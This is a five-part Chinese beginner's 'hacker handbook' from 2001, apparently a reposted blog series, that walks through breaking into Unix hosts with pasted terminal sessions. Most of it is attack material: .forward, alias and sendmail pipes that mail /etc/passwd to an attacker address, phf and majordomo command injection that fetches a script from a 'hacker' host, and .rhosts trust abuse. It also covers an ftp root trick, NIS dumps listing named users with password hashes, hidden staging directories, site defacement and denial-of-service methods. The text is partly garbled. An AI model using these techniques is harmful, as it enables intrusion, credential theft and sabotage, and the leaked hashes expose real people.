samsa黑客手册,适合入门(1)
(2001-12-02 06:13)
samsa
[摘要] 入侵一个系统有很多步骤,阶段性很强的“工作”,其最终的目
标是获得超级用户权限——对目标系统的绝对控制。从对该系统一无所知
开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露
出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或配
置上的漏洞,试图从目标系统上取回重要信息(如口令文件)、或在上面
执行命令,通过这些办法,我们有可能在该系统上获得一个普通的shell
接口;接下来,我们再利用目标系统本地的操作系统或应用程序的漏洞试
图提升我们在该系统上的权限,攫取超级用户控制;适当的善后工作包括
隐藏身份、消除痕迹、安置特洛伊木马和留后门。
(零)、确定目标
(一)、 白手起家(情报搜集)
从一无所知开始:
…
...
看什么:
(samsa: [/f]最要紧!!)
[numen]
Login Name TTY Idle When Where
root Super-User console 1 Fri 10:03 :0
root Super-User pts/6 6 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/8 1 Fri 10:04 :0.0
root Super-User pts/1 4 Fri 10:08 :0.0
root Super-User pts/11 3:16 Fri 09:53 192.168.0.114
root Super-User pts/10 Fri 13:08 192.168.0.116
root Super-User pts/12 1 Fri 10:13 :0.0
(samsa: root 这么多,不容易被发现哦~)
[victim]
Login Name TTY Idle When Where
ylx ??? pts/9 192.168.0.79
[numen]
Login Name TTY Idle When Where
root Super-User console 7 Fri 10:03 :0
root Super-User pts/6 11 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/11 3:21 Fri 09:53 192.16 numen:
root Super-User pts/11 3:21 Fri 09:53 192.16 numen:
ts/10 May 7 13:08 18 (192.168.0.116)
(samsa:如果没有finger,就只好有rusers乐)
export table of numen:
/space/users/lpf sun9
samsa:/space/users/lpf
sun9:/space/users/lpf
(samsa:该机提供了那些共享目录,谁共享了这些目录[/etc/dfs/dfstab])
program vers proto port service
(samsa:[/etc/rpc]可惜没开rexd,据说开了rexd就跟没password一样哦!
不过有rstat,rusers,mount和nfs:-)
access control disabled, clients can connect from any host
(samsa:great!!!)
xwininfo: Window id: 0x25 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1152
Height: 900
Depth: 24
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x21 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: 0 0 -0 0 -0-0 0-0
-geometry 1152x900
0 0
(samsa:can't be greater!!!!!!!!!!!)
Trying 192.168.
Connected to numen.
Escape character is '^]'.
(CST)
expn root
vrfy ylx
expn ftp
expn ftp
(samsa:ftp说明有匿名ftp)
(samsa:如果没有finger和rusers,只好用这种方法一个个猜用户名乐)
debug
wiz
(samsa:这些著名的漏洞现在哪儿还会有呢?:-(()
...
(samsa:satan 是图形界面的,就没法陈列了!!
列举出 victim 的系统类型(e.g.SunOS 5.7),提供的服务(e.g.WWW)和存在的脆弱性)
samsa黑客手册,适合入门(2)
(2001-12-02 06:13)
二、隔山打牛(远程攻击)
tftp"gt; get /etc/passwd
Error code 2: Access violation
tftp"gt; get /etc/shadow
Error code 2: Access violation
tftp"gt; quit
(samsa:一无所获,但是...)
tftp"gt; get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp"gt; get /etc/shadow
Error code 2: Access violation
(samsa:成功了!!!;-)
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa:可惜是shadow过了的:-/)
Connected to sun8.
Name (sun8:root): anonymous
Password:
(samsa:your e-mail address,当然,是假的:-"gt;)
黑客必备cmd命令大全ftp"gt; ls
bin
dev
etc
incoming
pub
usr
ftp"gt; cd etc
ftp"gt; ls
group
passwd
ftp"gt; get passwd
local: passwd remote: passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)
"quot;| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"quot;
Connected to victim
Name (victim:zen): ftp
Password:[your e-mail address:forged]
ftp"gt; put forward_sucker_file .forward
ftp"gt; quit
(samsa:等着passwd文件随邮件来到吧...)
著名的cgi大bug
silly/cgi-bin/nph-test-cgi?*
silly/cgi-bin/phf?Qalias=x
less /etc/passwd
silly.edu/cgi-bin/campus?
/bin/cat
/etc/passwd
/bin/cat
/etc/passwd
silly/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
addr\
(samsa:行太长,折了折,不要紧吧? ;-)
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
drwxr-xr-x 6 1005 staff 2560 1999 5月 11
.
$ cat "gt;.forward
$ cat "gt;.forward
"quot;| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"quot;
^D
(samsa:等着你的邮件吧....)
利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
关于sniffer的原理和技术细节,见[samsa 1999].
(samsa:没什么意思,有种``胜之不武''的感觉...)
nis-master # echo 'foo: "quot;| mail me@my.e-mail.addr "gt; /etc/alias
s
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim
<利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp\$me@hacker.home.edu:script\$/tmp
/script;;source\$/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail
/
bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
利用sendmail 5.55的漏洞:
Connected to victim
Escape character is '^]'.
mail from: "quot;|/bin/mail me@my.e-mail.addr 250 "quot;|/bin/mail me@my.e-mail.addr rcpt to: nosuchuser
data
..
quit
Connection closed by foreign host.
()
samsa黑客手册,适合入门(3)
(2001-12-02 06:13)
2) 远程控制
向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待# 耗费其
网络资源,从而导致其网络服务不可用。
向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接不暇 被尽?
类似2.1.2)发大量udp包。
发大量e-mail到对方邮箱,使其没有剩余容量接收正常邮件。
向目标系统某端口发送一点特定数据,使之崩溃。
冒充特定网络连接之一放向网络上发送特定包(FIN或RST),以中止特定网络连接;
(samsa:在网上看见NT下也有一个叫的buggy CGI,详情不清楚)
同1.7,利用majordomo(ver. 1.94.3)的漏洞
据说如果rexd开放,且rpcbind不是secure方式,就相当于没有口令,可以任意远程
运行目标机器上的过?
如果xhost的access control is disabled,就可以远程控制这台机器的显示系统,在
上面示,还可以偷窃键盘输入和显示内容,甚至可以远程执行...
samsa黑客手册,适合入门(4)
(2001-12-02 06:13)
三、登堂入室(远程登录)
要点是取得用户帐号和保密字
<使用john the riper:
猜法:与用户名相同的口令,用户名的简单变体,机构名,机器型号etc
< cxl: cxl,cxl111,cxl123,cxl12345,cxlsun,
(samsa:如果用户数足够多,这种方法还是很有效的:需要运气和灵感)
关键在信任关系,即:/etc/hosts.equiv,~/.rhosts文件
如果/etc/hosts.equiv文件中有一个"quot; "quot;,那么任何一台主机上的任何一个用户(root除
外),可以远程登录而不需要口令,并成为该机上同名用户;
如果某用户
主目录(home directory)下.rhosts文件中有一个"quot; "quot;,那么任何一台主机上
的同名用户可以远程登录而不需要口令
如果某用户的主目录共享出来
export list for numen:
/space/users/lpf sun9
/
space/users/zw (everyone)
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
$ cat "gt;.rhosts
^D
$ rsh numen csh -i
Warning: no access to tty; thus no job control in
numen%
利用``decode''别名
a) 若任一用户主目录(e.g./home/zen)或其下.rhosts对daemon可写,则
(samsa:于是/home/zem/.rhosts中就出现一个"quot; "quot;)
b) 无用户主目录或其下.rhosts对daemon可写,则利用/etc/aliases.pag,
因为许多系统中该文件是world-writable.
bin: "quot;| cat /etc/passwd | mail me@my.e-mail.addr"quot;
c) sendmail 5.59 以前的bug
telnet victim 25 "lt;"lt; EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
..
rcpt to: /home/zen/.rhosts
mail from: zen
data
..
quit
EOSM
x.xxx
Connected to victim
Escape character is '^]'.
Connection closed by foreign host.
Welcome to victim!
$
d) sendmail 的一个较`新'bug
Connected to victim
Escape character is '^]'.
mail from: "quot;|echo "gt;"gt; /home/zen/.rhosts"quot;
rcpt to: nosuchuser
data
..
quit
Connection closed by foreign host.
Welcome to victim!
$
r-命令的信任关系建立在IP上,所以通过IP-spoofing可以获得信任;
类似于telnet,也必须拿到用户名和口令
ftp"gt; open victim
Connected to victim
ected to victim
ftp"gt; quote user ftp
ftp"gt; quote cwd ~root
ftp"gt; quote pass ftp
ftp"gt; ls -al / (or whatever)
(samsa:你已经是root了)
samsa黑客手册,适合入门(5)
(2001-12-02 06:12)
四、溜门
一旦在目标机上获得一个(普通用户)shell,能做的事情就多了
能看则看,能取则取,能破则破
$ cat /etc/passwd
......
......
$ domainname
cas.ac
$ ypwhich -d cas.ac
$ ypcat passwd
ox% domainname
ios.ac
ox% nisls
ios.ac:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.:
passwd
group
auto_master
auto_home
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% _dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445:::
:::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....
(samsa:gotcha!!!)
ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox
ox% domainname
ios.ac
ox% ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863 mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0 mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
-
------------------- -------------------- ----- ----- ------ ---------
default 159.226.5.189 UG 0 1198
......
ox% cd /tmp
ox% cd /tmp
ox% mkdir .hide
ox% cd .hide
ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800 \
-a -perm -0020 \) \) -print` "gt;.wr
(samsa:wr=writables:可写目录、文件)
ox% grep '^d' .wr "gt; .wd
(samsa:wd=writable directories:目录)
ox% grep '^-' .wr "gt; .wf
(samsa:wf=writable files:普通文件)
ox% ls -l `find / \( -perm -4000 -a -user root \) -print` "gt;.sr
(samsa:sr=suid roots)
绝大多数系统 http 根目录下权限设置有误!不信请看:
ox1% grep http /f
ox1% ps -ef | grep http
http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/f
http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/f
root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -
f /opt/home1/ofc/http/httpd/f
......
ox1% cd /opt/home1/ofc/http/httpd
ox1% ls -l |more
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research
(samsa:哈哈!!差不多全都可以写,太牛了,改吧,还等什么??)
利用系统漏洞捣乱
< Solaris 2.5(2.5.1)下:
$ ping -sv -i 127.0.0.1 224.0.0.1
PING 224.
发表评论